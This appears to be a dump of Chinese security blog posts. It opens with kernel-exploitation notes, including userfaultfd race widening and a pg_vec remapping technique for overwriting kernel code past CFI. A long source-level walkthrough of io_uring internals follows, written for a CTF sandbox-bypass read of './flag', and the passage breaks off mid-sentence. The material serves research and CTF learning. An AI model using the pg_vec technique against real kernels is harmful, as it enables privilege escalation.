基于pipe_buffer的溢出通解 #TODO Race condition double feach 由于内核模块是全局的,如果对于内核模块的数据访问没有加锁,就很有可能出现竞态漏洞。 userfault 在linux 5.11以下可用。 主要是用来辅助条件竞争漏洞。 userfault是一个在用户态进行缺页处理接口。 在正常情况下, race condition的时间窗口是很短暂的,如果能够通过userfault 将操作停住,就能够将竞争的时间窗口扩大,实现竞争。 fuse // 通过CVE分析fuse的利用 #TODO UASM 来自 https://vul.360.net/archives/391 的利用 这个利用笔者最初有点犹豫放在哪个部分。 最后笔者还是决定将内容单独列一个二级目录,因为笔者认为这代表了一种新的利用方法, 不仅仅是 pg_vec, 在io_uring中,同样存在着内核和用户地址的共同映射,有没有可能也利用此来利用呢。 甚至直接对内核页表进行修改,实际上也可以归结为这种利用的一部分。 更进一步的, 笔者认为,UASM 也许可以用在page level uaf中(由于笔者太菜了,暂时先码着)。 简单而言,在创建socket并设置packet后,此时,内核维护一个 pg_vec 数组,每一个数组地址对应着一个虚拟地址。 此时,如果能够通过UAF或者溢出修改pg_vec, 然后再在用户态调用mmap,内核实际上: 12345678910111213141516171819/net/packet/af_packet.cstatic int packet_mmap(file, sock, vma){ for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) { for (i = 0; i < rb->pg_vec_len; i++) { struct page *page; void *kaddr = rb->pg_vec[i].buffer; for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) { page = pgv_to_page(kaddr); err = vm_insert_page(vma, start, page); if (unlikely(err)) goto out; start += PAGE_SIZE; kaddr += PAGE_SIZE; } } } return err;} 通过vm_insert_page 将这些页,插入了用户态地址空间。 这些页需要满足如下要求 page不为匿名页 不为Slab子系统分配的页 page不含有type 这就限制了使用内核堆的页面。 123456789/mm/memory.cstatic int validate_page_before_insert(struct page *page) { if (PageAnon(page) || PageSlab(page) || page_has_type(page)) return -EINVAL; flush_dcache_page(page); return 0; } 值得一提的是,这里pg_vec原来的虚拟地址原来的权限是无所谓的,因为并没有对原来虚拟地址的内存权限(也即这个页表项的内存权限)进行检查。 因此我们可以直接修改内核代码段或者内核模块代码段、数据段。 而且线性映射区域存在内核的全部映射,可以在这个地址范围找到上述页面。 更妙的是,pg_vec可以由用户态决定,不过其分配flag是GFP_KERNEL 相比于ROP,利用更加简单,并且不受CFI的影响。 dirtypagetable #TODO POP | page level ROP 来自blachhat2021的一种思路,主要是用来拓展脑洞,实际利用起来不如UASM直接改内核代码方便。但是很有传统利用的美感。 #TODO tricks 基于inter硬件漏洞的leak tricks 在内核“堆基址”(page_offset_base) + 0x9d000 处存放着 secondary_startup_64 函数的地址 从CTF到实战利用的哲思 #TODO","categories":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/categories/Pwn/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"},{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"}]},{"title":"Linux.io_uring-Top-down-Approach","slug":"Linux.io_uring-Top-down-Approach","date":"2023-12-04T06:08:56.000Z","updated":"2024-03-05T00:46:36.001Z","comments":true,"path":"Linux.io_uring-Top-down-Approach/","link":"","permalink":"https://v3rdant.cn/Linux.io_uring-Top-down-Approach/","excerpt":"最近在N1线下赛遇见一个seccomp沙箱,限制了只能使用 io_uring_setup 一个系统调用,之前不久的ACTF中, 使用mmap、io_uring_setup、io_uring_enter 三个系统调用,完成了orw。 如何仅仅使用 io_uring_setup 完成orw呢? 本文将不仅仅局限于CTF,而是从io_uring的实现出发,先从宏观角度透视io_uring的实现框架, 然后以源代码为基础,自顶向下,从liburing,到内核io_uring的用户态接口, 最后到io_uring的内核实现,一步步聚焦 io_uring 具体的实现。 由于笔者的研究方向的是二进制安全,因此笔者将更多关注 io_uring 中用户和内核态的通信这一容易产生安全漏洞的模块,而不会聚焦io_uring的异步调度和任务处理,以上。","text":"最近在N1线下赛遇见一个seccomp沙箱,限制了只能使用 io_uring_setup 一个系统调用,之前不久的ACTF中, 使用mmap、io_uring_setup、io_uring_enter 三个系统调用,完成了orw。 如何仅仅使用 io_uring_setup 完成orw呢? 
本文将不仅仅局限于CTF,而是从io_uring的实现出发,先从宏观角度透视io_uring的实现框架, 然后以源代码为基础,自顶向下,从liburing,到内核io_uring的用户态接口, 最后到io_uring的内核实现,一步步聚焦 io_uring 具体的实现。 由于笔者的研究方向的是二进制安全,因此笔者将更多关注 io_uring 中用户和内核态的通信这一容易产生安全漏洞的模块,而不会聚焦io_uring的异步调度和任务处理,以上。 overview 在开始前,首先介绍一下什么是io_uring 。 io_uring 是 Linux 5.1 引入的一套新的异步 I/O 接口机制,主要有以下特点: 高效 - 通过共享内存和锁自由的接口设计大大降低了系统调用开销。 灵活 - 支持阻塞,非阻塞,轮询多种调用方式,可以同时提交多个 I/O 请求并通过轮询或异步方式得到完成通知。 通用 - 支持文件,网络,时间,引用计数等多种 I/O,统一了异步 I/O 接口。 io_uring 主要由提交队列(SQ)、完成队列(CQ)、SQEs 请求和 CQEs 结果组成。 其中SQE和CQE 分别是SQ和CQ中的一个实体。 应用通过mmap映射SQ和CQ,向SQ提交I/O请求,再通过读CQ获取I/O完成结果。这避免了大量的 context switch 和系统调用开销。 这里以ACTF星盟的师傅写的liburing实现orw的一个小例子来介绍一下io_uring 的工作原理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131// ref from https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup/#title-9#define _GNU_SOURCE#include <stdio.h>#include <fcntl.h>#include <string.h>#include <liburing.h>#include <unistd.h>#include <syscall.h>#include <sys/prctl.h>#define QUEUE_DEPTH 1int main() { struct io_uring ring = {0}; struct io_uring_sqe *sqe; struct io_uring_cqe *cqe; int fd, ret; char buffer[4096] = {0}; if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) { perror("io_uring_queue_init"); return 1; } // 准备打开操作 sqe = io_uring_get_sqe(&ring); if (!sqe) { fprintf(stderr, "Failed to get SQE\\n"); return 1; } int dirfd = AT_FDCWD; // 当前工作目录的文件描述符 const char *pathname = "./flag"; int flags = O_RDONLY; io_uring_prep_openat(sqe, dirfd, pathname, flags, 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&ring); if (ret < 0) { perror("io_uring_submit"); return 1; } // 等待完成 ret = io_uring_wait_cqe(&ring, &cqe); if (ret < 0) { perror("io_uring_wait_cqe"); return 1; } // 处理完成的请求 if (cqe->res < 0) { fprintf(stderr, "Open error: %d\\n", cqe->res); return 1; } fd = cqe->res; // 获取打开的文件描述符 // 准备读取操作 sqe = io_uring_get_sqe(&ring); if (!sqe) { fprintf(stderr, "Failed to get SQE\\n"); return 1; } io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&ring); if (ret < 0) { perror("io_uring_submit"); return 1; } // 等待完成 ret = io_uring_wait_cqe(&ring, &cqe); if (ret < 0) { perror("io_uring_wait_cqe"); return 1; } // 处理完成的请求 if (cqe->res < 0) { fprintf(stderr, "Read error: %d\\n", cqe->res); return 1; } // 准备写操作 sqe = io_uring_get_sqe(&ring); if (!sqe) { fprintf(stderr, "Failed to get SQE\\n"); return 1; } io_uring_prep_write(sqe, 1, buffer, strlen(buffer), 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&ring); if (ret < 0) { perror("io_uring_submit"); return 1; } // 等待完成 ret = io_uring_wait_cqe(&ring, &cqe); if (ret < 0) { perror("io_uring_wait_cqe"); return 1; } // 处理完成的请求 if (cqe->res < 0) { fprintf(stderr, "Read error: %d\\n", cqe->res); return 1; } // printf("Read %d bytes: %s\\n", cqe->res, buffer); // 清理并关闭文件 io_uring_cqe_seen(&ring, cqe); io_uring_queue_exit(&ring); close(fd); sleep(1); return 0;} 可以看到,如果要使用io_uring会经历如下流程: 首先通过 io_uring_queue_init 完成了初始化,io_uring的sq和cq队列也被创建 在库内部实际上是使用 io_uring_setup 和 mmap 两个syscall实现 前者完成了内核中相应结构体和资源的创建,后者将两个队列映射到用户态内存,通过共享内存方便用户态访问 1234if (io_uring_queue_init(QUEUE_DEPTH, &ring, 0) < 0) { perror("io_uring_queue_init"); return 1;} 然后,用户使用 io_uring_get_sqe 得到一个sqe,(SQ队列中的一个实体) ,并根据所要完成的任务,设置sqe的各个成员, 这个过程是完全在用户态完成的 123456789101112sqe = io_uring_get_sqe(&ring);if (!sqe) { fprintf(stderr, 
"Failed to get SQE\\n"); return 1;}int dirfd = AT_FDCWD; // 当前工作目录的文件描述符const char *pathname = "./flag";int flags = O_RDONLY;io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);io_uring_sqe_set_data(sqe, NULL); 最后,通过 io_uring_submit 提交了请求,库内部实际上是调用了 io_uring_enter 1ret = io_uring_submit(&ring); io_uring任务收割模式 这里主要解释一下 IORING_SETUP_SQPOLL 和 IORING_SETUP_IOPOLL 的区别 IORING_SETUP_SQPOLL When this flag is specified, a kernel thread is created to perform submission queue polling. An io_uring instance configured in this way enables an application to issue I/O without ever context switching into the kernel. By using the submission queue to fill in new submission queue entries and watching for completions on the completion queue, the application can submit and reap I/Os without doing a single system call. If the kernel thread is idle for more than sq_thread_idle milliseconds, it will set the IORING_SQ_NEED_WAKEUP bit in the flags field of the struct io_sq_ring. When this happens, the application must call io_uring_enter(2) to wake the kernel thread. If I/O is kept busy, the kernel thread will never sleep. An application making use of this feature will need to guard the io_uring_enter(2) call with the following code sequence: /* * Ensure that the wakeup flag is read after the tail pointer * has been written. It’s important to use memory load acquire * semantics for the flags read, as otherwise the application * and the kernel might not agree on the consistency of the * wakeup flag. */ unsigned flags = atomic_load_relaxed(sq_ring->flags); if (flags & IORING_SQ_NEED_WAKEUP) io_uring_enter(fd, 0, 0, IORING_ENTER_SQ_WAKEUP); IORING_SETUP_IOPOLL Perform busy-waiting for an I/O completion, as opposed to getting notifications via an asynchronous IRQ (Interrupt Request). The file system (if any) and block device must support polling in order for this to work. Busy-waiting provides lower latency, but may consume more CPU resources than interrupt driven I/O. Currently, this feature is usable only on a file descriptor opened using the O_DIRECT flag. When a read or write is submitted to a polled context, the application must poll for completions on the CQ ring by calling io_uring_enter(2). It is illegal to mix and match polled and non-polled I/O on an io_uring instance. This is only applicable for storage devices for now, and the storage device must be configured for polling. How to do that depends on the device type in question. For NVMe devices, the nvme driver must be loaded with the poll_queues parameter set to the desired number of polling queues. The polling queues will be shared appropriately between the CPUs in the system, if the number is less than the number of online CPU threads. 
即,SQPOLL 通过内核线程定时唤醒来收割任务 IOPOLL 通过 io_uring_enter 通知内核来收割任务 struct 其次,需要在讲解前,介绍一下 liburing 和 内核暴露出的一些结构体: liburing 首先是 io_uring 这是liburing 关于io_uring的核心管理结构体 12345678910111213struct io_uring { struct io_uring_sq sq; // sq 管理结构体 struct io_uring_cq cq; // cq 管理结构体 unsigned flags; // setup时的flag设置 // 以下setup返回时写入params的一些信息 int ring_fd; unsigned features; int enter_ring_fd; __u8 int_flags; __u8 pad[3]; unsigned pad2;}; io_uring_sq, sq的管理结构体, 这个结构体在6.5及以下的版本可以在内核中找到,在6.5以上的版本在内核中删除了,6.5以上存在io_rings,相当于io_uring_sq和io_uring_cq 的组合 1234567891011121314151617181920212223struct io_uring_sq { unsigned *khead; unsigned *ktail; // Deprecated: use `ring_mask` instead of `*kring_mask` unsigned *kring_mask; // Deprecated: use `ring_entries` instead of `*kring_entries` unsigned *kring_entries; unsigned *kflags; unsigned *kdropped; unsigned *array; struct io_uring_sqe *sqes; unsigned sqe_head; unsigned sqe_tail; size_t ring_sz; void *ring_ptr; unsigned ring_mask; unsigned ring_entries; unsigned pad[2];}; 在此着重解释一下ring_ptr和 sqes两个成员: 这两个成员,在没有设置NO_MMAP的情况下,都是由 io_uring_setup 后用mmap映射得到的。 ring_prt指向一连串内核用来处理io_uring时的信息,例如当前循环队列head和tail, io_uring_setup 返回时会设置 io_uring_params 中的 sq_off 结构,这个结构就记录了各个成员信息,相对于ring_ptr的偏移, 最后在 [[#io_uring_setup_ring_pointers]] 中设置相关变量指向和内核共享的内存区域中对应的偏移。 而sqes,就是真正的共享队列的区域 类似的,存在io_uring_cq 结构体 kernel 首先是io_uring_params 他是io_uring_setup 传入的参数,同时,返回时,kernel会给此结构体相应成员赋值. 此结构体也是提供给用户态的API 12345678910111213struct io_uring_params { __u32 sq_entries; __u32 cq_entries; __u32 flags; __u32 sq_thread_cpu; // 内核任务处理线程占用的cpu __u32 sq_thread_idle; // 内核任务处理线程最大闲置时间, // 见`IORING_SETUP_SQPOLL` __u32 features; __u32 wq_fd; __u32 resv[3]; struct io_sqring_offsets sq_off; struct io_cqring_offsets cq_off;}; 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970struct io_uring_sqe { __u8 opcode; /* type of operation for this sqe */ __u8 flags; /* IOSQE_ flags */ __u16 ioprio; /* ioprio for the request */ __s32 fd; /* file descriptor to do IO on */ union { __u64 off; /* offset into file */ __u64 addr2; struct { __u32 cmd_op; __u32 __pad1; }; }; union { __u64 addr; /* pointer to buffer or iovecs */ __u64 splice_off_in; }; __u32 len; /* buffer size or number of iovecs */ union { __kernel_rwf_t rw_flags; __u32 fsync_flags; __u16 poll_events; /* compatibility */ __u32 poll32_events; /* word-reversed for BE */ __u32 sync_range_flags; __u32 msg_flags; __u32 timeout_flags; __u32 accept_flags; __u32 cancel_flags; __u32 open_flags; __u32 statx_flags; __u32 fadvise_advice; __u32 splice_flags; __u32 rename_flags; __u32 unlink_flags; __u32 hardlink_flags; __u32 xattr_flags; __u32 msg_ring_flags; __u32 uring_cmd_flags; }; __u64 user_data; /* data to be passed back at completion time */ /* pack this to avoid bogus arm OABI complaints */ union { /* index into fixed buffers, if used */ __u16 buf_index; /* for grouped buffer selection */ __u16 buf_group; } __attribute__((packed)); /* personality to use, if used */ __u16 personality; union { __s32 splice_fd_in; __u32 file_index; struct { __u16 addr_len; __u16 __pad3[1]; }; }; union { struct { __u64 addr3; __u64 __pad2[1]; }; /* * If the ring is initialized with IORING_SETUP_SQE128, then * this field is used for 80 bytes of arbitrary command data */ __u8 cmd[0]; };}; io_uring_sqe , 用来表征一个IO任务的sqe, 通过在sqes 环形队列上插入此结构体, 实现内核任务的提交. 其中大部分参数都是提交给相应的任务处理函数的参数. 
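Since most sqe fields are simply forwarded to the op handler, filling one by hand — as you would have to in a seccomp-restricted setting without liburing — is straightforward. A minimal sketch for IORING_OP_OPENAT; the field choices mirror io_uring_prep_openat()/io_uring_prep_rw() shown later in this post, and sqe is assumed to point into the mmap'ed sqes array:

```c
#include <string.h>
#include <fcntl.h>
#include <linux/io_uring.h>

static void fill_openat_sqe(struct io_uring_sqe *sqe, const char *path)
{
    memset(sqe, 0, sizeof(*sqe));           /* SQE slots are reused; clear stale fields */
    sqe->opcode     = IORING_OP_OPENAT;     /* selects the op handler in the kernel */
    sqe->fd         = AT_FDCWD;             /* dirfd argument of openat() */
    sqe->addr       = (unsigned long)path;  /* pathname pointer */
    sqe->len        = 0;                    /* mode, unused for O_RDONLY */
    sqe->open_flags = O_RDONLY;             /* flags argument of openat() */
    sqe->user_data  = 0x1337;               /* echoed back in the matching CQE */
}
```

After filling the entry, the index still has to be published through the SQ ring (sq_array and the tail) before the kernel picks it up, as the annotated struct below and the submission path later in the post show.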
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970struct io_uring_sqe { __u8 opcode; // 任务的类型, 用一系列枚举变量来表示 __u8 flags; // 任务的一些标志位, 可以设置任务的一些特性 __u16 ioprio; /* ioprio for the request */ __s32 fd; /* file descriptor to do IO on */ union { __u64 off; /* offset into file */ __u64 addr2; struct { __u32 cmd_op; __u32 __pad1; }; }; union { __u64 addr; /* pointer to buffer or iovecs */ __u64 splice_off_in; }; __u32 len; /* buffer size or number of iovecs */ union { __kernel_rwf_t rw_flags; __u32 fsync_flags; __u16 poll_events; /* compatibility */ __u32 poll32_events; /* word-reversed for BE */ __u32 sync_range_flags; __u32 msg_flags; __u32 timeout_flags; __u32 accept_flags; __u32 cancel_flags; __u32 open_flags; __u32 statx_flags; __u32 fadvise_advice; __u32 splice_flags; __u32 rename_flags; __u32 unlink_flags; __u32 hardlink_flags; __u32 xattr_flags; __u32 msg_ring_flags; __u32 uring_cmd_flags; }; __u64 user_data; /* data to be passed back at completion time */ /* pack this to avoid bogus arm OABI complaints */ union { /* index into fixed buffers, if used */ __u16 buf_index; /* for grouped buffer selection */ __u16 buf_group; } __attribute__((packed)); /* personality to use, if used */ __u16 personality; union { __s32 splice_fd_in; __u32 file_index; struct { __u16 addr_len; __u16 __pad3[1]; }; }; union { struct { __u64 addr3; __u64 __pad2[1]; }; /* * If the ring is initialized with IORING_SETUP_SQE128, then * this field is used for 80 bytes of arbitrary command data */ __u8 cmd[0]; };}; io_ring_ctx 是kernel io_uring运行的上下文,记录了io_uring 运行时需要保存的一些信息,这里就不一一分析每个成员了 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188struct io_ring_ctx { /* const or read-mostly hot data */ struct { unsigned int flags; unsigned int drain_next: 1; unsigned int restricted: 1; unsigned int off_timeout_used: 1; unsigned int drain_active: 1; unsigned int has_evfd: 1; /* all CQEs should be posted only by the submitter task */ unsigned int task_complete: 1; unsigned int lockless_cq: 1; unsigned int syscall_iopoll: 1; unsigned int poll_activated: 1; unsigned int drain_disabled: 1; unsigned int compat: 1; struct task_struct *submitter_task; struct io_rings *rings; struct percpu_ref refs; enum task_work_notify_mode notify_method; } ____cacheline_aligned_in_smp; /* submission data */ struct { struct mutex uring_lock; /* * Ring buffer of indices into array of io_uring_sqe, which is * mmapped by the application using the IORING_OFF_SQES offset. * * This indirection could e.g. be used to assign fixed * io_uring_sqe entries to operations and only submit them to * the queue when needed. * * The kernel modifies neither the indices array nor the entries * array. 
*/ u32 *sq_array; struct io_uring_sqe *sq_sqes; unsigned cached_sq_head; unsigned sq_entries; /* * Fixed resources fast path, should be accessed only under * uring_lock, and updated through io_uring_register(2) */ struct io_rsrc_node *rsrc_node; atomic_t cancel_seq; struct io_file_table file_table; unsigned nr_user_files; unsigned nr_user_bufs; struct io_mapped_ubuf **user_bufs; struct io_submit_state submit_state; struct io_buffer_list *io_bl; struct xarray io_bl_xa; struct io_hash_table cancel_table_locked; struct io_alloc_cache apoll_cache; struct io_alloc_cache netmsg_cache; /* * ->iopoll_list is protected by the ctx->uring_lock for * io_uring instances that don't use IORING_SETUP_SQPOLL. * For SQPOLL, only the single threaded io_sq_thread() will * manipulate the list, hence no extra locking is needed there. */ struct io_wq_work_list iopoll_list; bool poll_multi_queue; } ____cacheline_aligned_in_smp; struct { /* * We cache a range of free CQEs we can use, once exhausted it * should go through a slower range setup, see __io_get_cqe() */ struct io_uring_cqe *cqe_cached; struct io_uring_cqe *cqe_sentinel; unsigned cached_cq_tail; unsigned cq_entries; struct io_ev_fd __rcu *io_ev_fd; unsigned cq_extra; } ____cacheline_aligned_in_smp; /* * task_work and async notification delivery cacheline. Expected to * regularly bounce b/w CPUs. */ struct { struct llist_head work_llist; unsigned long check_cq; atomic_t cq_wait_nr; atomic_t cq_timeouts; struct wait_queue_head cq_wait; } ____cacheline_aligned_in_smp; /* timeouts */ struct { spinlock_t timeout_lock; struct list_head timeout_list; struct list_head ltimeout_list; unsigned cq_last_tm_flush; } ____cacheline_aligned_in_smp; struct io_uring_cqe completion_cqes[16]; spinlock_t completion_lock; /* IRQ completion list, under ->completion_lock */ struct io_wq_work_list locked_free_list; unsigned int locked_free_nr; struct list_head io_buffers_comp; struct list_head cq_overflow_list; struct io_hash_table cancel_table; const struct cred *sq_creds; /* cred used for __io_sq_thread() */ struct io_sq_data *sq_data; /* if using sq thread polling */ struct wait_queue_head sqo_sq_wait; struct list_head sqd_list; unsigned int file_alloc_start; unsigned int file_alloc_end; struct xarray personalities; u32 pers_next; struct list_head io_buffers_cache; /* Keep this last, we don't need it for the fast path */ struct wait_queue_head poll_wq; struct io_restriction restrictions; /* slow path rsrc auxilary data, used by update/register */ struct io_mapped_ubuf *dummy_ubuf; struct io_rsrc_data *file_data; struct io_rsrc_data *buf_data; /* protected by ->uring_lock */ struct list_head rsrc_ref_list; struct io_alloc_cache rsrc_node_cache; struct wait_queue_head rsrc_quiesce_wq; unsigned rsrc_quiesce; struct list_head io_buffers_pages; #if defined(CONFIG_UNIX) struct socket *ring_sock; #endif /* hashed buffered write serialization */ struct io_wq_hash *hash_map; /* Only used for accounting purposes */ struct user_struct *user; struct mm_struct *mm_account; /* ctx exit and cancelation */ struct llist_head fallback_llist; struct delayed_work fallback_work; struct work_struct exit_work; struct list_head tctx_list; struct completion ref_comp; /* io-wq management, e.g. 
thread count */ u32 iowq_limits[2]; bool iowq_limits_set; struct callback_head poll_wq_task_work; struct list_head defer_list; unsigned sq_thread_idle; /* protected by ->completion_lock */ unsigned evfd_last_cq_tail; /* * If IORING_SETUP_NO_MMAP is used, then the below holds * the gup'ed pages for the two rings, and the sqes. */ unsigned short n_ring_pages; unsigned short n_sqe_pages; struct page **ring_pages; struct page **sqe_pages;}; liburing liburing 提供的核心接口有如下函数: io_uring_queue_init io_uring的初始化结构,用来初始化一个 io_uring 结构体 io_uring_prep_xxx 用来创建一个任务 io_uring_submit 用来提交一个任务 io_uring_queue_init 参数: entries: sq队列大小 rings: io_uring 结构体, liburing提供给用户态的管理结构 flags: 传递给 io_uring_setup 的 params 中的 flag, 用来控制创建的io_uring的特性, 详情可以看 io_uring_set_up 返回值: fd: 用来mmap的fd 12345678910__cold int io_uring_queue_init(unsigned entries, struct io_uring *ring, unsigned flags){ struct io_uring_params p; memset(&p, 0, sizeof(p)); p.flags = flags; return io_uring_queue_init_params(entries, ring, &p);} 接下来是一系列调用链: 1234-->io_uring_queue_init -->io_uring_queue_init_params -->io_uring_queue_init_try_nosqarr -->__io_uring_queue_init_params 最后到 __io_uring_queue_init_params 其中 p 是要传递给 io_uring_setup 的params, buf 的使用将在后面分析. 123456789101112131415161718int __io_uring_queue_init_params(unsigned entries, struct io_uring *ring, struct io_uring_params *p, void *buf, size_t buf_size){ int fd, ret = 0; unsigned *sq_array; unsigned sq_entries, index; memset(ring, 0, sizeof(*ring)); /* * The kernel does this check already, but checking it here allows us * to avoid handling it below. */ if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY && !(p->flags & IORING_SETUP_NO_MMAP)) return -EINVAL; // 如果设置了REGISTERED_FD_ONLY 就必须要设置 NO_MMAP 对于设置了NO_MMAP的请求,通过 io_uring_alloc_huge 进行了预处理,这个函数我们将在之后[[#io_uring_alloc_huge]]进行分析 123456789if (p->flags & IORING_SETUP_NO_MMAP) { ret = io_uring_alloc_huge(entries, p, &ring->sq, &ring->cq, buf, buf_size); if (ret < 0) return ret; if (buf) ring->int_flags |= INT_FLAG_APP_MEM;}// 如果设置了NO_MMAP,就要预先分配大内存 接下来就是调用io_uring_setup 完成真正的初始化操作了。 1234567891011fd = __sys_io_uring_setup(entries, p);// syscall(__NR_io_uring_setup, entries, p) if (fd < 0) { if ((p->flags & IORING_SETUP_NO_MMAP) && !(ring->int_flags & INT_FLAG_APP_MEM)) { __sys_munmap(ring->sq.sqes, 1); io_uring_unmap_rings(&ring->sq, &ring->cq); } return fd;}// 错误处理 对于没有设置 NO_MMAP 的情形,需要在此时mmap为sq和cq在用户态映射内存[[#io_uring_queue_mmap]],反之,直接设置ring相关指针[[#io_uring_setup_ring_pointers]] 123456789if (!(p->flags & IORING_SETUP_NO_MMAP)) { ret = io_uring_queue_mmap(fd, p, ring); if (ret) { __sys_close(fd); return ret; }} else { io_uring_setup_ring_pointers(p, &ring->sq, &ring->cq);} 之后,是将io_uring_setup 设置在 params 中的各种变量复制到用户态管理结构体ring中。 12345678910111213141516171819202122 sq_entries = ring->sq.ring_entries; if (!(p->flags & IORING_SETUP_NO_SQARRAY)) { sq_array = ring->sq.array; for (index = 0; index < sq_entries; index++) sq_array[index] = index; } ring->features = p->features; // io_uring 的 特性 ring->flags = p->flags; // io_uring 设置的标志 ring->enter_ring_fd = fd; // 返回的fd if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) { ring->ring_fd = -1; ring->int_flags |= INT_FLAG_REG_RING | INT_FLAG_REG_REG_RING; } else { ring->ring_fd = fd; } return ret;} io_uring_alloc_huge io_uring_alloc_huge 是对于设置了NO_MMAP的程序,预先在用户态设置好SQ和CQ的内存的函数 首先是会用到的各种参数和变量 1234567891011static int io_uring_alloc_huge(unsigned entries, struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq, void *buf, size_t buf_size){ unsigned long page_size = get_page_size(); unsigned sq_entries, 
cq_entries; size_t ring_mem, sqes_mem; unsigned long mem_used = 0; void *ptr; int ret; 接下来是首先确定了sq和eq entrie的数量。这里具体的算法就不在这里分析了,主要包括合法性检查和幂2向上取整的运算等。 123ret = get_sq_cq_entries(entries, p, &sq_entries, &cq_entries);if (ret) return ret; 接下来就是计算sq和cq需要的内存大小了,计算过程非常直观,笔者就不赘述了: 123456789sqes_mem = sq_entries * sizeof(struct io_uring_sqe);sqes_mem = (sqes_mem + page_size - 1) & ~(page_size - 1);ring_mem = cq_entries * sizeof(struct io_uring_cqe);if (p->flags & IORING_SETUP_CQE32) ring_mem *= 2;if (!(p->flags & IORING_SETUP_NO_SQARRAY)) ring_mem += sq_entries * sizeof(unsigned);mem_used = sqes_mem + ring_mem;mem_used = (mem_used + page_size - 1) & ~(page_size - 1); 接下来,就是真正决定sq和cq的用户态地址了。 首先,如果用户传入了buf,并且buf_size足够大, 那么就设置为用户buf 否则,就mmap出一片内存来使用(根据size计算的不同可能是4K也可能是4M,分别是一页和一个大页(二级页表对应的大小)) 12345678910111213141516171819202122if (!buf && (sqes_mem > huge_page_size || ring_mem > huge_page_size)) return -ENOMEM;if (buf) { if (mem_used > buf_size) return -ENOMEM; ptr = buf;} else { int map_hugetlb = 0; if (sqes_mem <= page_size) buf_size = page_size; else { buf_size = huge_page_size; map_hugetlb = MAP_HUGETLB; } ptr = __sys_mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|map_hugetlb, -1, 0); if (IS_ERR(ptr)) return PTR_ERR(ptr);}sq->sqes = ptr; 并以类似的方式设置了sq->ring_ptr 123456789101112131415161718192021222324252627282930if (mem_used <= buf_size){ sq->ring_ptr = (void *)sq->sqes + sqes_mem; /* clear ring sizes, we have just one mmap() to undo */ cq->ring_sz = 0; sq->ring_sz = 0;}else{ int map_hugetlb = 0; if (ring_mem <= page_size) buf_size = page_size; else { buf_size = huge_page_size; map_hugetlb = MAP_HUGETLB; } ptr = __sys_mmap(NULL, buf_size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | map_hugetlb, -1, 0); if (IS_ERR(ptr)) { __sys_munmap(sq->sqes, 1); return PTR_ERR(ptr); } sq->ring_ptr = ptr; sq->ring_sz = buf_size; cq->ring_sz = 0;} 不过下面一部分就是真正重要的了: p正是传入 io_uring_setup 的结构体,所以对p的赋值才是至关重要的,这里的sq和cq不过是 liburing 暴露给用户的管理结构 io_uring 中的一个成员 1234cq->ring_ptr = (void *)sq->ring_ptr;p->sq_off.user_addr = (unsigned long)sq->sqes;p->cq_off.user_addr = (unsigned long)sq->ring_ptr;return (int)mem_used; 所以规根结底就是写入了 p的 sq_off 和 cq_off io_uring_queue_mmap 这是对于没有设置NO_MMAP的情形下,完成了 syscall io_uring_setup 处理后,mmap的流程 123456__cold int io_uring_queue_mmap(int fd, struct io_uring_params *p, struct io_uring *ring){ memset(ring, 0, sizeof(*ring)); return io_uring_mmap(fd, p, &ring->sq, &ring->cq);} 首先是计算了sq和cq的ring的size 123456789101112static int io_uring_mmap(int fd, struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq){ size_t size; int ret; size = sizeof(struct io_uring_cqe); if (p->flags & IORING_SETUP_CQE32) size += sizeof(struct io_uring_cqe); sq->ring_sz = p->sq_off.array + p->sq_entries * sizeof(unsigned); cq->ring_sz = p->cq_off.cqes + p->cq_entries * size; 然后开始mmap sq 和 cq ring的指针: 1234567891011121314151617181920212223242526272829if (p->features & IORING_FEAT_SINGLE_MMAP){ if (cq->ring_sz > sq->ring_sz) sq->ring_sz = cq->ring_sz; cq->ring_sz = sq->ring_sz;}sq->ring_ptr = __sys_mmap(0, sq->ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQ_RING);// offset = 0if (IS_ERR(sq->ring_ptr)) return PTR_ERR(sq->ring_ptr);if (p->features & IORING_FEAT_SINGLE_MMAP){ cq->ring_ptr = sq->ring_ptr;}else{ cq->ring_ptr = __sys_mmap(0, cq->ring_sz, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_CQ_RING); // offset = 8000000 if (IS_ERR(cq->ring_ptr)) { ret = PTR_ERR(cq->ring_ptr); cq->ring_ptr = NULL; goto err; }} 如果设置了 
